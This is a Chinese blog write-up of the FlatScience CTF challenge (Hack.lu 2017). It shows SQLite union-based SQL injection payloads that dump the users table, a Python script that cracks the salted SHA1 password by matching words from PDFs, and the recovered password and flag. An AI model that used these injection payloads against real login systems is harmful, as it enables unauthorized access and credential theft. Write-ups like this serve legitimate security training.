攻防世界WEB进阶之FlatScience

最新推荐文章于 2024-07-21 08:53:04 发布
最新推荐文章于 2024-07-21 08:53:04 发布
阅读量5.5k 收藏 3
点赞数 1
分类专栏: 攻防世界 文章标签: FlatScience 攻防世界 安全渗透 网络安全 攻防世界web进阶
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/harry_c/article/details/101773526
版权

攻防世界WEB进阶之FlatScience


FlatScience
难度系数: 1星
题目来源: Hack.lu-2017
题目描述:暂无
题目场景: 略
题目附件: 暂无

一、分析

点击打开场景,发现都是文件下载的内容,是几篇英文文献
上一题有用到的robots.txt,构造一下http://IP:端口/robots.txt
果然有重要内容:
在这里插入图片描述

二、实操

分别进入像个网站,发现有一个是默认是admin账号,尝试使用admin账号进行登录,但是并没有什么反馈
然后尝试使用admin账号在login页面进行登录
测试了很多数据发现输入admin’时会出现报错
在这里插入图片描述
根据报错SQLLite3找到对应的查询数据库的代码
代码:


    CppSQLite3Queryquery = db.execQuery("select * fromtarget_table");
        while(!query.eof())
        {
            cout<<"name:"<<query.getStringField("name")<<"age : "<<query.getIntField("age")<<endl;
            query.nextRow();
        }
        query.finalize();

CppSQLite3Query是一个查询返回对象,查询完后可以利用此类。这里就使用CppSQLite3DB的一个函数

execQuery,只要将查询sql传入即可。

eof函数:判断是否还有数据;

nextRow函数:移到下一条记录;

getStringField函数:获得相应字段的内容,以字符串形式返回;

getIntField函数:获得相应字段的内容,以整形形式返回。
通过分析此处应该存在SQL注入

注意我们在进行漏洞查找的过程中应该要结合浏览器的开发工具一起进行,发现网址泄露了某些参数或者网址,根据GET请求,我们能够迅速判断是参数
在这里插入图片描述
构造?debug参数出现源码泄露

找到关键代码SQL语句:

"SELECT id,name from Users where name='".$user."' and password='".sha1($pass."Salz!")."'"

通过SQL语句注入构建我们设计出如下查询的SQL语句:

' union select  name,sql  from sqlite_master--

然后查询到返回包里面有Set-Cookie字段
在这里插入图片描述
+CREATE+TABLE+Users(id+int+primary+key,name+varchar(255),password+varchar(255),hint+varchar(255))

构造查询密码的SQL:usr=%27 UNION SELECT id, password from Users–+&pw=chybeta
构造查询用户的SQL:usr=%27 UNION SELECT id, name from Users --+&pw=chybeta
构造查询隐藏线索的SQL:usr=%27 UNION SELECT id, hint from Users–+&pw=chybeta
最终的输出数据分别是:
在这里插入图片描述
name=+admin
在这里插入图片描述
name=+3fab54a50e770d830c0416df817567662a9dc85c
在这里插入图片描述
name=+my+fav+word+in+my+fav+paper%3F%21
我们根据这句话洞察到,最终你的密码还是不在我们的网站中,说我最喜欢的词(密码)在我最喜欢的文章中
好吧,还得找到作者最喜欢的文章,但是我们之前查到有密码,所以有可能这个就是作者最喜欢的文章的哈希值
SQL基础知识积累:
UNION :合并两个或者两个以上的SQL语句(默认地,UNION 操作符选取不同的值)
UNION ALL:合并操作符相同的几个SQL语句
#:url中#号是用来指导浏览器动作的(例如锚点),对服务器端完全无用。所以,HTTP请求中不包括#使用时#号改成url的编码%23就可以了
–:注释(注意后面需要接入一个空格才能正常执行)

这里工作量已经很多了,但是还是得编写脚本,好吧坚持不下去了,找到了一个大佬的脚本,这里直接贴上来:
from cStringIO import StringIO
from pdfminer.pdfinterp import PDFResourceManager, PDFPageInterpreter
from pdfminer.converter import TextConverter
from pdfminer.layout import LAParams
from pdfminer.pdfpage import PDFPage
import sys
import string
import os
import hashlib
 
def get_pdf():
	return [i for i in os.listdir("./") if i.endswith("pdf")]
 
 
def convert_pdf_2_text(path):
    rsrcmgr = PDFResourceManager()
    retstr = StringIO()
    device = TextConverter(rsrcmgr, retstr, codec='utf-8', laparams=LAParams())
    interpreter = PDFPageInterpreter(rsrcmgr, device)
    with open(path, 'rb') as fp:
        for page in PDFPage.get_pages(fp, set()):
            interpreter.process_page(page)
        text = retstr.getvalue()
    device.close()
    retstr.close()
    return text
 
 
def find_password():
	pdf_path = get_pdf()
	for i in pdf_path:
		print "Searching word in " + i
		pdf_text = convert_pdf_2_text(i).split(" ")
		for word in pdf_text:
			sha1_password = hashlib.sha1(word+"Salz!").hexdigest()
			if sha1_password == '3fab54a50e770d830c0416df817567662a9dc85c':
				print "Find the password :" + word
				exit()
 
if __name__ == "__main__":
	find_password()

最终得到的密码是:
ThinJerboa
登录到admin.php上拿到Flag

三、答案

至此最终的flag为:flag{Th3_Fl4t_Earth_Prof_i$_n0T_so_Smart_huh?}

Just_Do_Eat
关注
专栏目录
攻防世界-FlatScience
m0_47571887的博客
11-20 942
打开题目,左右看了看,就是一些文章,试了下robots.txt,看到两个php 挨个访问,发现admin.php和login.ogo都是一个登陆页面,不过admin.php有一个默认的admin账号,猜测应该是获取到密码拿到flag,我们看看login.php里面有什么 在login.php页面里,我习惯性的先看一下源码,发现了一个?debug 提交过后,返回了一段源码, 这里我们看到数据库是SQLite3,不是MySQL,在sqlite数据库有一张sqlite_master表,..
攻防世界WebFlatScience
Light_inthe_eyes的博客
10-16 312
打开网页后,发现很多链接,点击后发现都是文章: 找不到突破口,用御剑扫扫看看有没有其他目录能进入,发现有robots.txt: 进入robots.txt: 发现有login.php和admin.php,通过代码审计,admin.php注释告诉不能通过它来突破,那就去login.php吧: 尝试SQL注入,发现有回显!并且知道这是sqlite数据库,并且单引号字符型注入: 爆字段量:1' order by 2--+不报错,1' order by 3--+报错,说明字段量为2: 查询资料了解: 意思就是:在
攻防世界WEB(新手模式)10-disabled_button
最新发布
你好
07-21 209
那么我们只需要删除这个属性就ok(把disabled这几个字母删除就ok,双击这个单词然后就可以删除了)点击f12查看,发现input被设置成了disabled属性。接下来回到题目,发现按钮可以点击了,直接出flag。点进去之后,确实诶,有个按钮但是点不动。题目给的提示:前端、按钮。
FlatScience攻防世界
m0_70819573的博客
02-28 292
发现$user基本没有过滤,可以进行sql注入,需要注意的是数据库是sqlite,查询语句与mysql会有差距,且其会自动创建sqlite_master库存储信息。4.用爬虫爬取所有论文,再用pdfminer库处理遍历pdf,获取admin密码,获得flag.3.在login.php查看源代码,发现get传参debug可以获取源码。并没有什么有效信息,发现robots.txt有提示信息。
攻防世界FlatScience
qq_46230755的博客
01-19 190
第一步扫一下目录 进入admin.php发现存在一个输入框 暂时没什么用 进入login.php 有个输入框,注入有回显,还报错 发现是SQLite3数据库 查看页面源码提示去debug 得到源码 <?php if(isset($_POST['usr']) && isset($_POST['pw'])){ $user = $_POST['usr']; $pass = $_POST['pw']; $db = new SQLite3
攻防世界 FlatScience
CyhDl666的博客
02-25 305
各种here these 一个个点 url不断变化 直接dirsearch扫描一些 - 最近做题经常做到robots.txt!!!1 访问了一下 也是给了admin.php 和 login.php 访问login界面是个登录窗 访问admin界面也是登录窗 不过账号已经给你了 看到登录界面难面尝试一下sql注入 这里我想到以前做个的一个sql注入加md5加密的题目 但是这个得需要知道查询的代码 没学过sqlite3 无奈wp CppSQLite3Queryquery = db.execQue.
攻防世界web进阶FlatScience
gongjingege的博客
08-05 310
打开链接 给了好几个地址,到处点,全是一些文章(还是英文的) dirsearch扫一下 或者robots.txt 到admin.php里看一下 试一下admin 不行?看一下源码 估计就不是从这上手了,那就login.php吧 试一试sql注入 报错,发现不是mysql,而是sqlite3(那这就难受了啊) 查看源码 url栏?debug= ?debug出现源码泄露 <?php if(isset($_POST['usr']) && isset($_POST['pw'])
攻防世界—-(web进阶FlatScience–WP
12-14
在这个“攻防世界—-(web进阶FlatScience–WP”的挑战中,我们需要解决一个Web安全相关的谜题。这个谜题涉及到多个技术点,包括Web应用漏洞利用、数据库注入、PDF文件处理以及哈希算法的应用。 首先,我们注意到...
攻防世界web进阶区全讲解(超详细的哇)!!(持续更新)
wo41ge的博客
10-13 2450
进入题目链接 有登录 就可能有注册界面 url栏register.php 或者直接上御剑扫一下 同样发现注册界面 注册成功后 进行登录 跳转到了这个界面
攻防世界 web 进阶 web2
weixin_42499640的博客
08-10 5152
进来是这样的 逆向这个加密算法 把给出的字符串逆向解密就能得到flag 简单审计一下代码 <?php $miwen="a1zLbgQsCESEIqRLwuQAyMwLyq2L5VwBxqGA3RQAyumZ0tmMvSGM2ZwB4tws"; function encode($str){ $_o=strrev($str); //反转字符串 // echo $_o; ...
攻防世界 web进阶—upload
weixin_42499640的博客
07-18 1466
这道题的大体思路是: 利用上传文件的文件名进行sql注入 这里先普及几个mysql函数的用法 1. CONV() 简单的来说这个函数就是用来进行***进制的转换***的 CONV(N,from_base,to_base) N是要转换的数据,from_base是原进制,to_base是目标进制。 select conv(16,10,16)...
攻防世界WEB】难度四星12分进阶题:FlatScience
07-23 691
攻防世界WEB】四星12分
网络安全 | CTF】FlatScience
等风来
12-29 2931
pass变量拼接Salz并且经过sha1加密后与password进行比较所以思路是SQL注入把pass找出来,注意这里的数据库是SQLite数据库先判断注入点个数:
xctf 攻防世界 FlatScience wp
qq_43054896的博客
03-08 872
一、dirsearch 扫目录 python dirsearch.py -u URL -e * 二、查看正常响应的链接和源码 admin.php 有登录框,注入只有Nono! Stahp?! login.php 也有登录框,逻辑注入就跳转了,说明是存在注入的 输入 admin’ order by 3 #,出现报错,是sqlite数据库: 查看页面源码,提示去 URL?debug 页面: ...
攻防世界-Web高手进阶区-FlatScience
feng的博客
09-13 672
前言 我只能说,神仙题。最神仙的就是最后的那个脚本,其他的真的还好。自己现在还没学python,还暂时看不懂那个脚本,只能直接利用了。正确12月之前把Linux学好后开始学python,然后回过头来把这个脚本自己写一遍。 WP 打开后发现是发现有点类似一个藏了很多论文的平台,分别把下方的链接都打开看看,结果并没有什么用。于是dirsearch扫一下目录,发现了类似登录和管理员的页面: 我分别进去看看,发现都需要进行登录。在f12查看源码的时候,我在login.php里面发现了:<!-- TODO:
攻防世界-web-FlatScience-从0到1的解题历程writeup
CTF小白的博客
04-14 2080
题目分析 首先拿到题目一脸懵逼,就是套娃界面,一层一层的pdf论文存放的目录。 所以先扫一下目录 发现存在admin.php和login.php,且扫描结果显示login.php有sql注入漏洞 尝试了一下发现登陆成功后就跳转到首页了 并且设置了一个cookie内容为+admin 我明明使用test登陆的结果却显示的admin,应该是没有test用户,所以默认取得数据库第一条记录。 然后去看看...
FlatScience XCTF web进阶FlatScience详解
林英俊的博客
09-11 746
FlatScience XCTF web进阶FlatScience详解目录扫描测试注入,万能密码获取所有的PDF的URL,并下载到本地,这里要用下递归把PDF所有的单词全部搞出来 一个个加密对和密码对比登录找到flag![在这里插入图片描述](https://img-blog.csdnimg.cn/aa3376d01a094c57ae92f9e2f2ee3a02.png?x-oss-process=image/watermark,type_ZHJvaWRzYW5zZmFsbGJhY2s,shadow_50
【愚公系列】2023年05月 攻防世界-WebFlatScience
时光隧道
05-27 7585
Robots协议,也称作robots.txt,是一种在Web站点中告诉搜索引擎蜘蛛哪些页面可以被访问的协议。该协议规定了机器人在访问网站时可以访问哪些页面和目录。一般来说,Robots协议被用来控制搜索引擎抓取和索引网站上的内容的方式。robots.txt文件必须放在网站的根目录下,并且它是一个普通的文本文件。它可以包含一系列指令,这些指令告诉搜索引擎蜘蛛哪些URL可以被访问,哪些不能被访问,访问的频率等等。
攻防世界web fileclude
07-27
攻防世界中的文件包含漏洞(File Inclusion Vulnerability)是一种常见的web安全漏洞。它主要出现在web应用程序中,当应用程序动态包含用户可控制的文件时,如果没有正确过滤和验证用户输入,攻击者可以利用这个漏洞执行恶意代码或读取敏感文件。 文件包含漏洞分为本地文件包含(Local File Inclusion,LFI)和远程文件包含(Remote File Inclusion,RFI)两种类型。LFI漏洞发生在应用程序尝试包含本地文件时,而RFI漏洞则允许攻击者通过远程服务器包含外部文件。 为了防止文件包含漏洞,开发人员应该遵循以下最佳实践: 1. 永远不要信任用户输入。对用户提供的文件名、路径或URL进行严格的输入验证和过滤。 2. 使用白名单机制限制可包含的文件范围。只允许应用程序包含预定义的合法文件,而不是用户可控制的任意文件。 3. 避免使用动态包含,尽量使用静态包含。如果必须使用动态包含,确保只包含可信任的文件。 4. 对于本地文件包含漏洞,限制访问文件系统的权限。确保应用程序只能访问必要的文件,并将敏感文件放在可访问性受限的目录下。 5. 对于远程文件包含漏洞,禁止从远程服务器包含文件,或者使用安全的方法验证和限制远程文件的来源。 6. 定期更新和修补应用程序的漏洞,以确保及时修复已知的文件包含漏洞和其他安全问题。 这些是一些常见的防范文件包含漏洞的方法,但在实际开发过程中,还需要根据具体情况采取其他安全措施来保护应用程序免受攻击。
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值